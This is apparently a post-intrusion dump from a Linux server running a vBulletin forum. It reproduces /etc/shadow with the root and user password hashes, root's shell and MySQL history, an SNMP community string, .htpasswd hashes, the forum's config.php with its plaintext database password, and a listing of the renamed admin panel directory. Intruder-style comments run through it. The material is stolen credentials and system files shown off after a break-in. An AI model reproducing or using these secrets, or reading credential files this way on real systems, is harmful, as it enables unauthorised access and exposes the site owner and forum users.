vpopmail:x:89:89:Vpopmail User:/home/lxadmin/mail:/sbin/nologin
lxpopuser:x:1005:1005:Vpopmail User:/home/lxadmin/mail:/sbin/nologin
alias:x:200:201:qmail alias:/var/qmail/alias:/sbin/nologin
qmaild:x:201:201:qmail daemon:/var/qmail:/sbin/nologin
qmaill:x:202:201:qmail logger:/var/qmail:/sbin/nologin
qmailp:x:203:201:qmail passwd:/var/qmail:/sbin/nologin
qmailq:x:204:201:qmail queue:/var/qmail:/sbin/nologin
qmailr:x:205:201:qmail remote:/var/qmail:/sbin/nologin
qmails:x:206:201:qmail send:/var/qmail:/sbin/nologin
admin:x:1006:1006:System User for admin:/home/admin:/sbin/nologin
clamav:x:46:46:Clam AntiVirus:/tmp:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
lighttpd:x:207:207:lighttpd web server:/var/www/lighttpd:/sbin/nologin
tinydns:x:1007:1007::/home/tinydns:/bin/bash
dnslog:x:1008:1008::/home/dnslog:/bin/bash
dnscache:x:1009:1009::/home/dnscache:/bin/bash
axfrdns:x:1010:1010::/home/axfrdns:/bin/bash
swissfaking:x:1011:1011:System User for swissfaking:/home/swissfaking/:/sbin/nologin
lsadm:x:208:1012::/:/sbin/nologin
root:$1$Kcqod2s0$BmvbgzZXh97NCMPjKYhC8.:14829:0:99999:7:::
bin:*:13649:0:99999:7:::
daemon:*:13649:0:99999:7:::
adm:*:13649:0:99999:7:::
lp:*:13649:0:99999:7:::
sync:*:13649:0:99999:7:::
shutdown:*:13649:0:99999:7:::
halt:*:13649:0:99999:7:::
mail:*:13649:0:99999:7:::
news:*:13649:0:99999:7:::
uucp:*:13649:0:99999:7:::
operator:*:13649:0:99999:7:::
games:*:13649:0:99999:7:::
gopher:*:13649:0:99999:7:::
ftp:*:13649:0:99999:7:::
nobody:*:13649:0:99999:7:::
vcsa:!!:13649:0:99999:7:::
dbus:!!:13649:0:99999:7:::
mailnull:!!:13649:0:99999:7:::
smmsp:!!:13649:0:99999:7:::
apache:!!:13649:0:99999:7:::
sshd:!!:13649:0:99999:7:::
rpc:!!:13649:0:99999:7:::
pcap:!!:13649:0:99999:7:::
rpm:!!:13649:0:99999:7:::
named:!!:13649:0:99999:7:::
nouser:!!:14377:0:99999:7:::
lxlabs:!!:14377:0:99999:7:::
distcache:!!:14377::::::
mysql:!!:14377::::::
vpopmail:!!:14377::::::
lxpopuser:!!:14377::::::
alias:!!:14377::::::
qmaild:!!:14377::::::
qmaill:!!:14377::::::
qmailp:!!:14377::::::
qmailq:!!:14377::::::
qmailr:!!:14377::::::
qmails:!!:14377::::::
admin:fYP3xnec:14377:0:99999:7:::
clamav:!!:14377::::::
webalizer:!!:14377::::::
lighttpd:!!:14378::::::
tinydns:!!:14378:0:99999:7:::
dnslog:!!:14378:0:99999:7:::
dnscache:!!:14378:0:99999:7:::
axfrdns:!!:14378:0:99999:7:::
swissfaking:$1$iIjtFFW1$ORA9J9S0/Geqkxrum7EY/0:14701:0:99999:7:::
lsadm:!!:14695::::::

# cd /root && ls -la
total 3516
drwxr-x---  7 root   root     4096 Jan  7 00:15 .
drwxr-xr-x 24 root   root     4096 Dec 30 14:33 ..
-rw-------  1 root   root     1648 Aug  9 08:43 .bash_history
-rw-r--r--  1 root   root       24 Jan  6  2007 .bash_logout
-rw-r--r--  1 root   root      191 Jan  6  2007 .bash_profile
-rw-r--r--  1 root   root      176 Jan  6  2007 .bashrc
-rw-r--r--  1 root   root      100 Jan  6  2007 .cshrc
drwxr-xr-x 16 lxlabs root     4096 Nov 18  2008 .etc
-rw-------  1 root   root       46 Jan  2 20:04 .lesshst
-rw-------  1 root   root       25 Jan  7 00:15 .mysql_history
-rw-------  1 root   root     1024 Mar 27  2010 .rnd
drwx------  2 root   root     4096 Aug  8 19:04 .ssh
-rw-r--r--  1 root   root      129 Jan  6  2007 .tcshrc
-rw-------  1 root   root     9584 Jan  7 00:15 .viminfo
drwxr-xr-x  2 root   root     4096 Nov 27 06:29 barf
-rw-r--r--  1 root   root     4821 Oct 18 12:07 download.html
drwxr-xr-x 12   1000 users    4096 May  5  2010 lsws-4.0.14
-rw-r--r--  1 root   root  2853622 May  3  2010 lsws-4.0.14-ent-i386-linux.tar.gz
drwxr-xr-x  8   1000  1000    4096 Oct 24 17:49 nginx-0.8.53
-rw-r--r--  1 root   root   649835 Oct 18 12:03 nginx-0.8.53.tar.gz

# cat .bash_history 
top
/etc/init.d/kloxo restart
df
cd /home
ls
cd sw*
ls
cd __*
ls
ls -lah
rm -rf *
df -h
top
/usr/local/ddos/ddos.sh
ls
rm -rf *
top
ps aux
ls
rm -rf *
/usr/local/ddos/ddos.sh
vi /usr/local/ddos/ddos.conf
rm -rf *
/usr/local/ddos/ddos.sh
df -h
iptables -L
exit
snmpwalk -c public -v 1 localhost .1.3.6.1.4.1.22253.200
ps -ef | grep snmp
more /etc/snmp/snmpd.conf 
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.200 
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.100 
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.101 
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.201 
vi /etc/snmp/snmpd.conf 
service snmpd restart
snmpwalk -c public -v 1 localhost .1.3.6.1.4.1.22253.201 
vi /etc/snmp/snmpd.conf 
service snmpd restart
snmpwalk -c public -v 1 localhost .1.3.6.1.4.1.22253.101 
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.101 
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.102 
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.103 
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.1043 
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.1053 
snmpwalk -c public -v 1 localhost .1.3.6.1.4.1.22253.100
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.100
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.100.1
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.100.2
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.106
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.107
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.105
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.104
snmpwalk -c swissvps -v 1 localhost .1.3.6.1.4.1.22253.112

# cat .mysql_history 
select * from ipaddress;

# cat /etc/snmp/snmpd.conf 
rocommunity swissvps
pass .1.3.6.1.4.1.22253 /usr/bin/php /usr/local/lsws/add-ons/snmp_monitoring/sample.php

# cd /home

# ls -la
total 52
drwxr-xr-x 13 root        root     4096 Mar 27  2010 .
drwxr-xr-x 24 root        root     4096 Dec 30 14:33 ..
drwxr-xr-x  2 root        root     4096 May 13  2009 admin
drwx------  2 axfrdns     axfrdns  4096 May 14  2009 axfrdns
drwx------  2 dnscache    dnscache 4096 May 14  2009 dnscache
drwx------  2 dnslog      dnslog   4096 May 14  2009 dnslog
drwxr-xr-x  3 root        root     4096 Mar 27  2010 httpd
drwxr-xr-x  7 root        root     4096 Jun  9  2010 kloxo
drwxr-xr-x  3 root        root     4096 May 13  2009 lxadmin
drwx------  2 lxlabs      lxlabs   4096 May 13  2009 lxlabs
drwx------  2 nouser      nogroup  4096 May 13  2009 nouser
drwxr-x---  5 swissfaking apache   4096 Jun 19  2010 swissfaking
drwx------  2 tinydns     tinydns  4096 May 14  2009 tinydns

# cd swissfaking/public_html/ && ls -la
total 408
drwxr-xr-x  6 swissfaking swissfaking   4096 Dec 31 18:47 .
drwxr-x---  5 swissfaking apache        4096 Jun 19  2010 ..
-rw-r--r--  1 swissfaking swissfaking    232 Oct 24 13:56 .htaccess2foo
-rw-r--r--  1 swissfaking swissfaking     39 Oct 24 13:56 .htpasswd
drwxr-xr-x 23 swissfaking swissfaking   4096 Jan  4 22:30 board
-rw-r--r--  1 swissfaking swissfaking   1208 Mar 27  2010 brushed.jpg
drwxr-xr-x  2 swissfaking swissfaking   4096 Mar 27  2010 cgi-bin
-rw-r--r--  1 swissfaking swissfaking   4286 Mar 27  2010 favicon.gif
drwxr-xr-x  2 swissfaking swissfaking   4096 Jun 21  2010 images
-rw-r--r--  1 swissfaking swissfaking    599 Oct 24 11:41 index.html
-rw-r--r--  1 swissfaking swissfaking   1099 Aug  9 23:48 index.html.old
-rwxr-xr-x  1 swissfaking swissfaking   2221 Apr 23  2010 index2.html
-rw-r--r--  1 swissfaking swissfaking  45132 Apr  9  2010 neverdie.jpg
drwxr-xr-x 21 swissfaking swissfaking   4096 Oct 10 14:35 sfvb4__blocked
-rw-r--r--  1 swissfaking swissfaking 303581 Dec 31 18:47 swiss2011.png

# #mad ddos protection ahead
# cat .htaccess2foo .htpasswd
#RewriteEngine on
#RewriteRule   ^index\.php$ cookie.html
AuthUserFile /home/swissfaking/swissfaking.net/.htpasswd
AuthGroupFile /dev/null
AuthName "User: 1 Passwort: 1"
AuthType Basic

<limit GET POST>
require valid-user
</limit>

1:$1$VuIT5qnw$SD8.UzvKgXUwoufPSiaR/.

# cd board && ls -la
total 2416
drwxr-xr-x 23 swissfaking swissfaking   4096 Jan  4 22:30 .
drwxr-xr-x  6 swissfaking swissfaking   4096 Dec 31 18:47 ..
-rw-r--r--  1 swissfaking swissfaking    238 Oct 24 13:33 .htaccess22foo
-rw-r--r--  1 swissfaking swissfaking     39 Oct 24 13:33 .htpasswd
-rw-r--r--  1 swissfaking swissfaking  23823 Mar 26  2010 ajax.php
-rw-r--r--  1 swissfaking swissfaking  75490 Mar 26  2010 album.php
-rw-r--r--  1 swissfaking swissfaking  17119 Mar 26  2010 announcement.php
drwxr-xr-x  2 swissfaking swissfaking   4096 Mar 26  2010 archive
-rw-r--r--  1 swissfaking swissfaking  18288 Mar 26  2010 attachment.php
-rw-r--r--  1 swissfaking swissfaking  35093 Apr 14  2010 banned.jpg
drwxr-xr-x  2 swissfaking swissfaking   4096 Nov 17 21:25 banners
-rw-r--r--  1 swissfaking swissfaking  75309 Mar 26  2010 calendar.php
-rw-r--r--  1 swissfaking swissfaking     43 Mar 26  2010 clear.gif
drwxr-xr-x  5 swissfaking swissfaking   4096 Jan  2 16:30 clientscript
-rw-r--r--  1 swissfaking swissfaking  15346 Mar 26  2010 converse.php
-rw-r--r--  1 swissfaking swissfaking    555 Oct 24 13:33 cookie.html
drwxr-xr-x  8 swissfaking swissfaking   4096 May  7  2010 cpstyles
-rw-r--r--  1 swissfaking swissfaking  49309 May 19  2010 credits.php
-rw-r--r--  1 swissfaking swissfaking   3299 Mar 26  2010 cron.php
drwxr-xr-x  3 swissfaking swissfaking   4096 Mar 26  2010 customavatars
drwxr-xr-x  3 swissfaking swissfaking   4096 Mar 26  2010 customgroupicons
drwxr-xr-x  2 swissfaking swissfaking   4096 Mar 26  2010 customprofilepics
-rw-r--r--  1 swissfaking swissfaking  47736 Mar 26  2010 editpost.php
-rw-r--r--  1 swissfaking swissfaking  29479 Mar 26  2010 external.php
drwxr-xr-x  2 swissfaking swissfaking   4096 Jan  4 22:35 falloutadm
-rw-r--r--  1 swissfaking swissfaking   9765 Mar 26  2010 faq2.phpoldold
-rw-r--r--  1 swissfaking swissfaking   4286 Mar 26  2010 favicon.gif
-rw-r--r--  1 swissfaking swissfaking  35640 Mar 26  2010 forumdisplay.php
-rw-r--r--  1 swissfaking swissfaking  39820 Mar 26  2010 global.php
-rw-r--r--  1 swissfaking swissfaking 137864 Mar 26  2010 group.php
-rw-r--r--  1 swissfaking swissfaking  24898 Mar 26  2010 group_inlinemod.php
-rw-r--r--  1 swissfaking swissfaking  10816 Mar 26  2010 groupsubscription.php
-rw-r--r--  1 swissfaking swissfaking   9026 Mar 26  2010 image.php
drwxr-xr-x 21 swissfaking swissfaking   4096 Oct 31 22:09 images
drwxr-xr-x  2 swissfaking swissfaking   4096 Apr  9  2010 img
drwxr-xr-x  7 swissfaking swissfaking  12288 Jan  2 22:12 includes
-rw-r--r--  1 swissfaking swissfaking  19575 Nov 27 04:26 index.php
drwxr-xr-x  6 swissfaking swissfaking   4096 Mar 26  2010 infernoshout
-rw-r--r--  1 swissfaking swissfaking  11083 Mar 26  2010 infernoshout.php
-rw-r--r--  1 swissfaking swissfaking  43808 Mar 26  2010 infraction.php
-rw-r--r--  1 swissfaking swissfaking 182738 Mar 26  2010 inlinemod.php
-rw-r--r--  1 swissfaking swissfaking   5850 Mar 26  2010 itrader.php
-rw-r--r--  1 swissfaking swissfaking  11784 Mar 26  2010 itrader_detail.php
-rw-r--r--  1 swissfaking swissfaking  11841 Mar 26  2010 itrader_feedback.php
-rw-r--r--  1 swissfaking swissfaking   1401 Mar 26  2010 itrader_global.php
-rw-r--r--  1 swissfaking swissfaking  19557 Mar 26  2010 itrader_main.php
-rw-r--r--  1 swissfaking swissfaking   3570 Mar 26  2010 itrader_report.php
drwxr-xr-x  2 swissfaking swissfaking   4096 Oct 10 19:11 jabber
-rw-r--r--  1 swissfaking swissfaking  10321 Mar 26  2010 joinrequests.php
-rw-r--r--  1 swissfaking swissfaking  10201 Mar 26  2010 login.php
-rw-r--r--  1 swissfaking swissfaking  17048 Mar 26  2010 member.php
-rw-r--r--  1 swissfaking swissfaking  15910 Mar 26  2010 member_inlinemod.php
-rw-r--r--  1 swissfaking swissfaking  35880 Mar 26  2010 memberlist.php
-rw-r--r--  1 swissfaking swissfaking  23846 Mar 26  2010 misc.php
-rw-r--r--  1 swissfaking swissfaking  63310 Mar 26  2010 moderation.php
-rw-r--r--  1 swissfaking swissfaking   6735 Mar 26  2010 moderator.php
-rw-r--r--  1 swissfaking swissfaking  18456 Mar 26  2010 newattachment.php
-rw-r--r--  1 swissfaking swissfaking  37083 Mar 26  2010 newreply.php
-rw-r--r--  1 swissfaking swissfaking  18890 Mar 26  2010 newthread.php
-rw-r--r--  1 swissfaking swissfaking  19583 Mar 26  2010 online.php
-rw-r--r--  1 swissfaking swissfaking   7675 Mar 26  2010 payment_gateway.php
-rw-r--r--  1 swissfaking swissfaking  11889 Mar 26  2010 payments.php
-rw-r--r--  1 swissfaking swissfaking   7868 Mar 26  2010 picture.php
-rw-r--r--  1 swissfaking swissfaking  22022 Mar 26  2010 picture_inlinemod.php
-rw-r--r--  1 swissfaking swissfaking  25293 Mar 26  2010 picturecomment.php
drwxr-xr-x  2 swissfaking swissfaking   4096 May 19  2010 plugins
-rw-r--r--  1 swissfaking swissfaking  27394 Mar 26  2010 poll.php
drwxr-xr-x  2 swissfaking swissfaking   4096 Mar 26  2010 polls
-rw-r--r--  1 swissfaking swissfaking   9491 Mar 26  2010 posthistory.php
-rw-r--r--  1 swissfaking swissfaking  75622 Jul 17 20:16 postings.php
-rw-r--r--  1 swissfaking swissfaking   6573 Mar 26  2010 printthread.php
-rw-r--r--  1 swissfaking swissfaking  70727 Mar 26  2010 private.php
-rw-r--r--  1 swissfaking swissfaking 152315 Mar 26  2010 profile.php
-rw-r--r--  1 swissfaking swissfaking    555 Mar 26  2010 quickpreview.php
-rw-r--r--  1 swissfaking swissfaking  39730 Mar 26  2010 register.php
-rw-r--r--  1 swissfaking swissfaking   5667 Mar 26  2010 report.php
-rw-r--r--  1 swissfaking swissfaking  13699 Mar 26  2010 reputation.php
drwxr-xr-x  2 swissfaking swissfaking   4096 Nov 30 01:07 runnerzzzmod
-rw-r--r--  1 swissfaking swissfaking 128640 May  6  2010 search.php
-rw-r--r--  1 swissfaking swissfaking  20673 Mar 26  2010 sendmessage.php
-rw-r--r--  1 swissfaking swissfaking   9988 Mar 26  2010 showgroups.php
-rw-r--r--  1 swissfaking swissfaking  11353 Mar 26  2010 showpost.php
-rw-r--r--  1 swissfaking swissfaking  73449 Mar 26  2010 showthread.php
drwxr-xr-x  2 swissfaking swissfaking   4096 Mar 26  2010 signaturepics
-rw-r--r--  1 swissfaking swissfaking  47803 Mar 26  2010 statistics__blocked_.php
drwxr-xr-x  2 swissfaking swissfaking   4096 Mar 26  2010 statsmod___blocked_
-rw-r--r--  1 swissfaking swissfaking  32827 Mar 26  2010 subscription.php
-rw-r--r--  1 swissfaking swissfaking   2091 Mar 26  2010 swisss.php
-rw-r--r--  1 swissfaking swissfaking  13344 Mar 26  2010 tags.php
-rw-r--r--  1 swissfaking swissfaking   8671 Mar 26  2010 threadrate.php
-rw-r--r--  1 swissfaking swissfaking  12394 Mar 26  2010 threadtag.php
-rw-r--r--  1 swissfaking swissfaking  34494 Mar 26  2010 usercp.php
-rw-r--r--  1 swissfaking swissfaking  19077 Mar 26  2010 usernote.php
-rw-r--r--  1 swissfaking swissfaking  27339 Mar 26  2010 visitormessage.php
drwxr-xr-x  5 swissfaking swissfaking   4096 Mar 26  2010 vmoods
drwxr-xr-x 13 swissfaking swissfaking   4096 Mar 26  2010 zseries_red
drwxr-xr-x  3 swissfaking swissfaking   4096 Jan  3 22:52 zxpwmvprzzugrzms

# cat includes/config.php 
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.8.4
|| # ---------------------------------------------------------------- # ||
|| # All PHP code in this file is ©2000-2009 Jelsoft Enterprises Ltd. # ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/

/*-------------------------------------------------------*\
| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
+---------------------------------------------------------+
| If you get any errors while attempting to connect to    |
| MySQL, you will need to email your webhost because we   |
| cannot tell you the correct values for the variables    |
| in this file.                                           |
\*-------------------------------------------------------*/

	//	****** DATABASE TYPE ******
	//	This is the type of the database server on which your vBulletin database will be located.
	//	Valid options are mysql and mysqli, for slave support add _slave.  Try to use mysqli if you are using PHP 5 and MySQL 4.1+
	// for slave options just append _slave to your preferred database type.
$config['Database']['dbtype'] = 'mysql';

	//	****** DATABASE NAME ******
	//	This is the name of the database where your vBulletin will be located.
	//	This must be created by your webhost.
$config['Database']['dbname'] = 'swissfak_abc';

	//	****** TABLE PREFIX ******
	//	Prefix that your vBulletin tables have in the database.
$config['Database']['tableprefix'] = 'zzg';

	//	****** TECHNICAL EMAIL ADDRESS ******
	//	If any database errors occur, they will be emailed to the address specified here.
	//	Leave this blank to not send any emails when there is a database error.
$config['Database']['technicalemail'] = '';

	//	****** FORCE EMPTY SQL MODE ******
	// New versions of MySQL (4.1+) have introduced some behaviors that are
	// incompatible with vBulletin. Setting this value to "true" disables those
	// behaviors. You only need to modify this value if vBulletin recommends it.
$config['Database']['force_sql_mode'] = false;



	//	****** MASTER DATABASE SERVER NAME AND PORT ******
	//	This is the hostname or IP address and port of the database server.
	//	If you are unsure of what to put here, leave the default values.
$config['MasterServer']['servername'] = 'localhost';
$config['MasterServer']['port'] = 3306;

	//	****** MASTER DATABASE USERNAME & PASSWORD ******
	//	This is the username and password you use to access MySQL.
	//	These must be obtained through your webhost.
$config['MasterServer']['username'] = 'swissfak_abc';
$config['MasterServer']['password'] = 'Pk56ZuV4TfXX87B4gZ';

	//	****** MASTER DATABASE PERSISTENT CONNECTIONS ******
	//	This option allows you to turn persistent connections to MySQL on or off.
	//	The difference in performance is negligible for all but the largest boards.
	//	If you are unsure what this should be, leave it off. (0 = off; 1 = on)
$config['MasterServer']['usepconnect'] = 0;



	//	****** SLAVE DATABASE CONFIGURATION ******
	//	If you have multiple database backends, this is the information for your slave
	//	server. If you are not 100% sure you need to fill in this information,
	//	do not change any of the values here.
$config['SlaveServer']['servername'] = '';
$config['SlaveServer']['port'] = 3306;
$config['SlaveServer']['username'] = '';
$config['SlaveServer']['password'] = '';
$config['SlaveServer']['usepconnect'] = 0;



	//	****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
	//	This setting allows you to change the name of the folders that the admin and
	//	moderator control panels reside in. You may wish to do this for security purposes.
	//	Please note that if you change the name of the directory here, you will still need
	//	to manually change the name of the directory on the server.
$config['Misc']['admincpdir'] = 'falloutadm';
$config['Misc']['modcpdir'] = 'runnerzzzmod';

	//	Prefix that all vBulletin cookies will have
	//	Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
$config['Misc']['cookieprefix'] = 'bb';

	//	******** FULL PATH TO FORUMS DIRECTORY ******
	//	On a few systems it may be necessary to input the full path to your forums directory
	//	for vBulletin to function normally. You can ignore this setting unless vBulletin
	//	tells you to fill this in. Do not include a trailing slash!
	//	Example Unix:
	//	  $config['Misc']['forumpath'] = '/home/users/public_html/forums';
	//	Example Win32:
	//	  $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
$config['Misc']['forumpath'] = '';



	//	****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
	//	The users specified here will be allowed to view the admin log in the control panel.
	//	Users must be specified by *ID number* here. To obtain a user's ID number,
	//	view their profile via the control panel. If this is a new installation, leave
	//	the first user created will have a user ID of 1. Seperate each userid with a comma.
$config['SpecialUsers']['canviewadminlog'] = '1';

	//	****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
	//	The users specified here will be allowed to remove ("prune") entries from the admin
	//	log. See the above entry for more information on the format.
$config['SpecialUsers']['canpruneadminlog'] = '1';

	//	****** USERS WITH QUERY RUNNING PERMISSIONS ******
	//	The users specified here will be allowed to run queries from the control panel.
	//	See the above entries for more information on the format.
	//	Please note that the ability to run queries is quite powerful. You may wish
	//	to remove all user IDs from this list for security reasons.
$config['SpecialUsers']['canrunqueries'] = '';

	//	****** UNDELETABLE / UNALTERABLE USERS ******
	//	The users specified here will not be deletable or alterable from the control panel by any users.
	//	To specify more than one user, separate userids with commas.
$config['SpecialUsers']['undeletableusers'] = '1';

	//	****** SUPER ADMINISTRATORS ******
	//	The users specified below will have permission to access the administrator permissions
	//	page, which controls the permissions of other administrators
$config['SpecialUsers']['superadministrators'] = '1';

	// ****** DATASTORE CACHE CONFIGURATION *****
	// Here you can configure different methods for caching datastore items.
	// vB_Datastore_Filecache  - to use includes/datastore/datastore_cache.php
	// vB_Datastore_APC - to use APC
	// vB_Datastore_XCache - to use XCache
	// vB_Datastore_Memcached - to use a Memcache server, more configuration below
// $config['Datastore']['class'] = 'vB_Datastore_Filecache';

	// ******** DATASTORE PREFIX ******
	// If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
	// than one set of forums installed on your host, you *may* need to use a prefix
	// so that they do not try to use the same variable within the cache.
	// This works in a similar manner to the database table prefix.
// $config['Datastore']['prefix'] = '';

	// It is also necessary to specify the hostname or IP address and the port the server is listening on
/*
$config['Datastore']['class'] = 'vB_Datastore_Memcached';
$i = 0;
// First Server
$i++;
$config['Misc']['memcacheserver'][$i]		= '127.0.0.1';
$config['Misc']['memcacheport'][$i]			= 11211;
$config['Misc']['memcachepersistent'][$i]	= true;
$config['Misc']['memcacheweight'][$i]		= 1;
$config['Misc']['memcachetimeout'][$i]		= 1;
$config['Misc']['memcacheretry_interval'][$i] = 15;
*/

// ****** The following options are only needed in special cases ******

	//	****** MySQLI OPTIONS *****
	// When using MySQL 4.1+, MySQLi should be used to connect to the database.
	// If you need to set the default connection charset because your database
	// is using a charset other than latin1, you can set the charset here.
	// If you don't set the charset to be the same as your database, you
	// may receive collation errors.  Ignore this setting unless you
	// are sure you need to use it.
// $config['Mysqli']['charset'] = 'utf8';

	//	Optionally, PHP can be instructed to set connection parameters by reading from the
	//	file named in 'ini_file'. Please use a full path to the file.
	//	Example:
	//	$config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
//$config['Mysqli']['ini_file'] = '/etc/mysql/my.cnf';

// Image Processing Options
	// Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings.
$config['Misc']['maxwidth'] = 2592;
$config['Misc']['maxheight'] = 1944;

/*======================================================================*\
|| ####################################################################
|| # 
|| # CVS: $RCSfile$ - $Revision: 28757 $
|| ####################################################################
\*======================================================================*/

# #one more time
# cat .htaccess22foo .htpasswd
#RewriteEngine on
#RewriteRule   ^index\.php$ cookie.html
AuthUserFile /home/swissfaking/swissfaking.net/board/.htpasswd
AuthGroupFile /dev/null
AuthName "User: 1 Passwort: 1"
AuthType Basic

<limit GET POST>
require valid-user
</limit>

1:$1$VuIT5qnw$SD8.UzvKgXUwoufPSiaR/.

# cd zxpwmvprzzugrzms && ls -la
total 2068
drwxr-xr-x  3 swissfaking swissfaking  4096 Jan  3 22:52 .
drwxr-xr-x 23 swissfaking swissfaking  4096 Jan  4 22:30 ..
-rw-r--r--  1 swissfaking swissfaking   495 Jan  3 22:38 .htaccess
-rw-r--r--  1 swissfaking swissfaking    26 Jan  3 22:38 .htpasswd
-rw-r--r--  1 swissfaking swissfaking 19317 Jan  3 22:52 accessmask.php
-rw-r--r--  1 swissfaking swissfaking 39558 Jan  3 22:52 admincalendar.php
-rw-r--r--  1 swissfaking swissfaking 49620 Jan  3 22:52 admininfraction.php
-rw-r--r--  1 swissfaking swissfaking 19126 Jan  3 22:52 adminlog.php
-rw-r--r--  1 swissfaking swissfaking  8125 Jan  3 22:52 adminpermissions.php
-rw-r--r--  1 swissfaking swissfaking 25492 Jan  3 22:52 adminreputation.php
-rw-r--r--  1 swissfaking swissfaking 32824 Jan  3 22:52 album.php
-rw-r--r--  1 swissfaking swissfaking 12980 Jan  3 22:52 announcement.php
-rw-r--r--  1 swissfaking swissfaking 54994 Jan  3 22:52 attachment.php
-rw-r--r--  1 swissfaking swissfaking 12488 Jan  3 22:52 attachmentpermission.php
-rw-r--r--  1 swissfaking swissfaking 19331 Jan  3 22:52 avatar.php
-rw-r--r--  1 swissfaking swissfaking 16437 Jan  3 22:52 bbcode.php
-rw-r--r--  1 swissfaking swissfaking 14758 Jan  3 22:51 bookmarksite.php
-rw-r--r--  1 swissfaking swissfaking 12059 Jan  3 22:51 calendarpermission.php
-rw-r--r--  1 swissfaking swissfaking    43 Jan  3 22:51 clear.gif
drwxr-xr-x  2 swissfaking swissfaking  4096 Jan  3 22:53 control_examples
-rw-r--r--  1 swissfaking swissfaking 65076 Jan  3 22:51 credits_admin.php
-rw-r--r--  1 swissfaking swissfaking 24025 Jan  3 22:51 cronadmin.php
-rw-r--r--  1 swissfaking swissfaking 10710 Jan  3 22:51 cronlog.php
-rw-r--r--  1 swissfaking swissfaking 34063 Jan  3 22:51 css.php
-rw-r--r--  1 swissfaking swissfaking 21795 Jan  3 22:51 diagnostic.php
-rw-r--r--  1 swissfaking swissfaking 11724 Jan  3 22:51 email.php
-rw-r--r--  1 swissfaking swissfaking 17458 Jan  3 22:51 faq.php
-rw-r--r--  1 swissfaking swissfaking 12143 Jan  3 22:51 force_read_thread.php
-rw-r--r--  1 swissfaking swissfaking 30113 Jan  3 22:51 forum.php
-rw-r--r--  1 swissfaking swissfaking 30039 Jan  3 22:51 forumpermission.php
-rw-r--r--  1 swissfaking swissfaking  7692 Jan  3 22:51 global.php
-rw-r--r--  1 swissfaking swissfaking 25898 Jan  3 22:51 help.php
-rw-r--r--  1 swissfaking swissfaking 51895 Jan  3 22:51 image.php
-rw-r--r--  1 swissfaking swissfaking 45450 Jan  3 22:51 index.php
-rw-r--r--  1 swissfaking swissfaking  8756 Jan  3 22:51 infernoshoutlog.php
-rw-r--r--  1 swissfaking swissfaking  3251 Jan  3 22:50 itrader_misc.php
-rw-r--r--  1 swissfaking swissfaking 37384 Jan  3 22:50 language.php
-rw-r--r--  1 swissfaking swissfaking 51623 Jan  3 22:50 mgc_cb_evo.php
-rw-r--r--  1 swissfaking swissfaking 69534 Jan  3 22:50 misc.php
-rw-r--r--  1 swissfaking swissfaking 34140 Jan  3 22:50 moderator.php
-rw-r--r--  1 swissfaking swissfaking 16889 Jan  3 22:50 modlog.php
-rw-r--r--  1 swissfaking swissfaking  1837 Jan  3 22:50 newsproxy.php
-rw-r--r--  1 swissfaking swissfaking 30631 Jan  3 22:50 notice.php
-rw-r--r--  1 swissfaking swissfaking 43202 Jan  3 22:50 options.php
-rw-r--r--  1 swissfaking swissfaking 12026 Jan  3 22:50 passwordcheck.php
-rw-r--r--  1 swissfaking swissfaking 62644 Jan  3 22:50 phrase.php
-rw-r--r--  1 swissfaking swissfaking 85854 Jan  3 22:50 plugin.php
-rw-r--r--  1 swissfaking swissfaking 33055 Jan  3 22:50 prefix.php
-rw-r--r--  1 swissfaking swissfaking 49757 Jan  3 22:50 profilefield.php
-rw-r--r--  1 swissfaking swissfaking 11300 Jan  3 22:49 ranks.php
-rw-r--r--  1 swissfaking swissfaking  5696 Jan  3 22:49 read_pms_deu.php
-rw-r--r--  1 swissfaking swissfaking 15668 Jan  3 22:49 replacement.php
-rw-r--r--  1 swissfaking swissfaking 11004 Jan  3 22:49 resources.php
-rw-r--r--  1 swissfaking swissfaking 30488 Jan  3 22:49 ripper.php
-rw-r--r--  1 swissfaking swissfaking 20657 Jan  3 22:49 rssposter.php
-rw-r--r--  1 swissfaking swissfaking 13164 Jan  3 22:49 socialgroup_icon.php
-rw-r--r--  1 swissfaking swissfaking 17538 Jan  3 22:49 socialgroups.php
-rw-r--r--  1 swissfaking swissfaking 11215 Jan  3 22:49 stamp.php
-rw-r--r--  1 swissfaking swissfaking  8623 Jan  3 22:49 stats.php
-rw-r--r--  1 swissfaking swissfaking  8170 Jan  3 22:49 subscriptionpermission.php
-rw-r--r--  1 swissfaking swissfaking 62261 Jan  3 22:49 subscriptions.php
-rw-r--r--  1 swissfaking swissfaking 91677 Jan  3 22:49 template.php
-rw-r--r--  1 swissfaking swissfaking  3911 Jan  3 22:49 textarea.php
